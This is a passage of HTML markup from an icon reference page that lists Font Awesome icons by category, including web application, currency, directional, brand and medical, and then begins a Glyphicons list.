<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-search"></i> fa-search</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-search-minus"></i> fa-search-minus</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-search-plus"></i> fa-search-plus</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-share"></i> fa-share</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-share-square"></i> fa-share-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-share-square-o"></i> fa-share-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-shield"></i> fa-shield</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-shopping-cart"></i> fa-shopping-cart</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sign-in"></i> fa-sign-in</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sign-out"></i> fa-sign-out</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-signal"></i> fa-signal</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sitemap"></i> fa-sitemap</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-smile-o"></i> fa-smile-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort"></i> fa-sort</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-alpha-asc"></i> fa-sort-alpha-asc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-alpha-desc"></i> fa-sort-alpha-desc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-amount-asc"></i> fa-sort-amount-asc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-amount-desc"></i> fa-sort-amount-desc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-asc"></i> fa-sort-asc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-desc"></i> fa-sort-desc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-down"></i> fa-sort-down <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-numeric-asc"></i> fa-sort-numeric-asc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-numeric-desc"></i> fa-sort-numeric-desc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sort-up"></i> fa-sort-up <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-spinner"></i> fa-spinner</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-square"></i> fa-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-square-o"></i> fa-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-star"></i> fa-star</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-star-half"></i> fa-star-half</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-star-half-empty"></i> fa-star-half-empty <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-star-half-full"></i> fa-star-half-full <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-star-half-o"></i> fa-star-half-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-star-o"></i> fa-star-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-subscript"></i> fa-subscript</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-suitcase"></i> fa-suitcase</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-sun-o"></i> fa-sun-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-superscript"></i> fa-superscript</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tablet"></i> fa-tablet</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tachometer"></i> fa-tachometer</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tag"></i> fa-tag</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tags"></i> fa-tags</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tasks"></i> fa-tasks</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-terminal"></i> fa-terminal</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-thumb-tack"></i> fa-thumb-tack</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-thumbs-down"></i> fa-thumbs-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-thumbs-o-down"></i> fa-thumbs-o-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-thumbs-o-up"></i> fa-thumbs-o-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-thumbs-up"></i> fa-thumbs-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-ticket"></i> fa-ticket</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-times"></i> fa-times</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-times-circle"></i> fa-times-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-times-circle-o"></i> fa-times-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tint"></i> fa-tint</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-down"></i> fa-toggle-down <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-left"></i> fa-toggle-left <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-right"></i> fa-toggle-right <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-up"></i> fa-toggle-up <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-trash-o"></i> fa-trash-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-trophy"></i> fa-trophy</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-truck"></i> fa-truck</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-umbrella"></i> fa-umbrella</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-unlock"></i> fa-unlock</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-unlock-alt"></i> fa-unlock-alt</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-unsorted"></i> fa-unsorted <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-upload"></i> fa-upload</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-user"></i> fa-user</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-users"></i> fa-users</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-video-camera"></i> fa-video-camera</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-volume-down"></i> fa-volume-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-volume-off"></i> fa-volume-off</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-volume-up"></i> fa-volume-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-warning"></i> fa-warning <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-wheelchair"></i> fa-wheelchair</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-wrench"></i> fa-wrench</div>
</div>
</section>
<section id="form-control">
<h4 class="page-header">Form Control Icons</h4>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-check-square"></i> fa-check-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-check-square-o"></i> fa-check-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-circle"></i> fa-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-circle-o"></i> fa-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dot-circle-o"></i> fa-dot-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-minus-square"></i> fa-minus-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-minus-square-o"></i> fa-minus-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus-square"></i> fa-plus-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus-square-o"></i> fa-plus-square-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-square"></i> fa-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-square-o"></i> fa-square-o</div>
</div>
</section>
<section id="currency">
<h4 class="page-header">Currency Icons</h4>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bitcoin"></i> fa-bitcoin <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-btc"></i> fa-btc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cny"></i> fa-cny <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dollar"></i> fa-dollar <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-eur"></i> fa-eur</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-euro"></i> fa-euro <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-gbp"></i> fa-gbp</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-inr"></i> fa-inr</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-jpy"></i> fa-jpy</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-krw"></i> fa-krw</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-money"></i> fa-money</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rmb"></i> fa-rmb <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rouble"></i> fa-rouble <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rub"></i> fa-rub</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-ruble"></i> fa-ruble <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rupee"></i> fa-rupee <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-try"></i> fa-try</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-turkish-lira"></i> fa-turkish-lira <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-usd"></i> fa-usd</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-won"></i> fa-won <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-yen"></i> fa-yen <span class="text-muted">(alias)</span></div>
</div>
</section>
<section id="text-editor">
<h4 class="page-header">Text Editor Icons</h4>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-align-center"></i> fa-align-center</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-align-justify"></i> fa-align-justify</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-align-left"></i> fa-align-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-align-right"></i> fa-align-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bold"></i> fa-bold</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chain"></i> fa-chain <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chain-broken"></i> fa-chain-broken</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-clipboard"></i> fa-clipboard</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-columns"></i> fa-columns</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-copy"></i> fa-copy <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-cut"></i> fa-cut <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dedent"></i> fa-dedent <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-eraser"></i> fa-eraser</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-file"></i> fa-file</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-file-o"></i> fa-file-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-file-text"></i> fa-file-text</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-file-text-o"></i> fa-file-text-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-files-o"></i> fa-files-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-floppy-o"></i> fa-floppy-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-font"></i> fa-font</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-indent"></i> fa-indent</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-italic"></i> fa-italic</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-link"></i> fa-link</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-list"></i> fa-list</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-list-alt"></i> fa-list-alt</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-list-ol"></i> fa-list-ol</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-list-ul"></i> fa-list-ul</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-outdent"></i> fa-outdent</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-paperclip"></i> fa-paperclip</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-paste"></i> fa-paste <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-repeat"></i> fa-repeat</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rotate-left"></i> fa-rotate-left <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-rotate-right"></i> fa-rotate-right <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-save"></i> fa-save <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-scissors"></i> fa-scissors</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-strikethrough"></i> fa-strikethrough</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-table"></i> fa-table</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-text-height"></i> fa-text-height</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-text-width"></i> fa-text-width</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-th"></i> fa-th</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-th-large"></i> fa-th-large</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-th-list"></i> fa-th-list</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-underline"></i> fa-underline</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-undo"></i> fa-undo</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-unlink"></i> fa-unlink <span class="text-muted">(alias)</span></div>
</div>
</section>
<section id="directional">
<h4 class="page-header">Directional Icons</h4>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-double-down"></i> fa-angle-double-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-double-left"></i> fa-angle-double-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-double-right"></i> fa-angle-double-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-double-up"></i> fa-angle-double-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-down"></i> fa-angle-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-left"></i> fa-angle-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-right"></i> fa-angle-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-angle-up"></i> fa-angle-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-down"></i> fa-arrow-circle-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-left"></i> fa-arrow-circle-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-o-down"></i> fa-arrow-circle-o-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-o-left"></i> fa-arrow-circle-o-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-o-right"></i> fa-arrow-circle-o-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-o-up"></i> fa-arrow-circle-o-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-right"></i> fa-arrow-circle-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-circle-up"></i> fa-arrow-circle-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-down"></i> fa-arrow-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-left"></i> fa-arrow-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-right"></i> fa-arrow-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrow-up"></i> fa-arrow-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows"></i> fa-arrows</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows-alt"></i> fa-arrows-alt</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows-h"></i> fa-arrows-h</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows-v"></i> fa-arrows-v</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-down"></i> fa-caret-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-left"></i> fa-caret-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-right"></i> fa-caret-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-down"></i> fa-caret-square-o-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-left"></i> fa-caret-square-o-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-right"></i> fa-caret-square-o-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-square-o-up"></i> fa-caret-square-o-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-caret-up"></i> fa-caret-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-circle-down"></i> fa-chevron-circle-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-circle-left"></i> fa-chevron-circle-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-circle-right"></i> fa-chevron-circle-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-circle-up"></i> fa-chevron-circle-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-down"></i> fa-chevron-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-left"></i> fa-chevron-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-right"></i> fa-chevron-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-chevron-up"></i> fa-chevron-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-hand-o-down"></i> fa-hand-o-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-hand-o-left"></i> fa-hand-o-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-hand-o-right"></i> fa-hand-o-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-hand-o-up"></i> fa-hand-o-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-long-arrow-down"></i> fa-long-arrow-down</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-long-arrow-left"></i> fa-long-arrow-left</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-long-arrow-right"></i> fa-long-arrow-right</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-long-arrow-up"></i> fa-long-arrow-up</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-down"></i> fa-toggle-down <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-left"></i> fa-toggle-left <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-right"></i> fa-toggle-right <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-toggle-up"></i> fa-toggle-up <span class="text-muted">(alias)</span></div>
</div>
</section>
<section id="video-player">
<h4 class="page-header">Video Player Icons</h4>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-arrows-alt"></i> fa-arrows-alt</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-backward"></i> fa-backward</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-compress"></i> fa-compress</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-eject"></i> fa-eject</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-expand"></i> fa-expand</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-fast-backward"></i> fa-fast-backward</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-fast-forward"></i> fa-fast-forward</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-forward"></i> fa-forward</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pause"></i> fa-pause</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-play"></i> fa-play</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-play-circle"></i> fa-play-circle</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-play-circle-o"></i> fa-play-circle-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-step-backward"></i> fa-step-backward</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-step-forward"></i> fa-step-forward</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-stop"></i> fa-stop</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-youtube-play"></i> fa-youtube-play</div>
</div>
</section>
<section id="brand">
<h4 class="page-header">Brand Icons</h4>
<div class="alert alert-info">
<ul class="margin-bottom-none padding-left-lg">
<li>All brand icons are trademarks of their respective owners.</li>
<li>The use of these trademarks does not indicate endorsement of the trademark holder by Font Awesome, nor vice versa.</li>
</ul>
</div>
<div class="row fontawesome-icon-list">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-adn"></i> fa-adn</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-android"></i> fa-android</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-apple"></i> fa-apple</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bitbucket"></i> fa-bitbucket</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bitbucket-square"></i> fa-bitbucket-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-bitcoin"></i> fa-bitcoin <span class="text-muted">(alias)</span></div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-btc"></i> fa-btc</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-css3"></i> fa-css3</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dribbble"></i> fa-dribbble</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-dropbox"></i> fa-dropbox</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-facebook"></i> fa-facebook</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-facebook-square"></i> fa-facebook-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-flickr"></i> fa-flickr</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-foursquare"></i> fa-foursquare</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-github"></i> fa-github</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-github-alt"></i> fa-github-alt</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-github-square"></i> fa-github-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-gittip"></i> fa-gittip</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-google-plus"></i> fa-google-plus</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-google-plus-square"></i> fa-google-plus-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-html5"></i> fa-html5</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-instagram"></i> fa-instagram</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-linkedin"></i> fa-linkedin</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-linkedin-square"></i> fa-linkedin-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-linux"></i> fa-linux</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-maxcdn"></i> fa-maxcdn</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pagelines"></i> fa-pagelines</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pinterest"></i> fa-pinterest</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-pinterest-square"></i> fa-pinterest-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-renren"></i> fa-renren</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-skype"></i> fa-skype</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-stack-exchange"></i> fa-stack-exchange</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-stack-overflow"></i> fa-stack-overflow</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-trello"></i> fa-trello</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tumblr"></i> fa-tumblr</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-tumblr-square"></i> fa-tumblr-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-twitter"></i> fa-twitter</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-twitter-square"></i> fa-twitter-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-vimeo-square"></i> fa-vimeo-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-vk"></i> fa-vk</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-weibo"></i> fa-weibo</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-windows"></i> fa-windows</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-xing"></i> fa-xing</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-xing-square"></i> fa-xing-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-youtube"></i> fa-youtube</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-youtube-play"></i> fa-youtube-play</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-youtube-square"></i> fa-youtube-square</div>
</div>
</section>
<section id="medical">
<h4 class="page-header">Medical Icons</h4>
<div class="row">
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-ambulance"></i> fa-ambulance</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-h-square"></i> fa-h-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-hospital-o"></i> fa-hospital-o</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-medkit"></i> fa-medkit</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-plus-square"></i> fa-plus-square</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-stethoscope"></i> fa-stethoscope</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-user-md"></i> fa-user-md</div>
<div class="col-md-3 col-sm-4"><i class="fa fa-fw fa-wheelchair"></i> fa-wheelchair</div>
</div>
</section>
</div><!-- /#fa-icons -->
<!-- glyphicons-->
<div class="tab-pane" id="glyphicons">
<ul class="bs-glyphicons">
<li>
<span class="glyphicon glyphicon-adjust"></span>
<span class="glyphicon-class">glyphicon glyphicon-adjust</span>
</li>
<li>
<span class="glyphicon glyphicon-align-center"></span>
<span class="glyphicon-class">glyphicon glyphicon-align-center</span>
</li>
<li>
<span class="glyphicon glyphicon-align-justify"></span>
<span class="glyphicon-class">glyphicon glyphicon-align-justify</span>
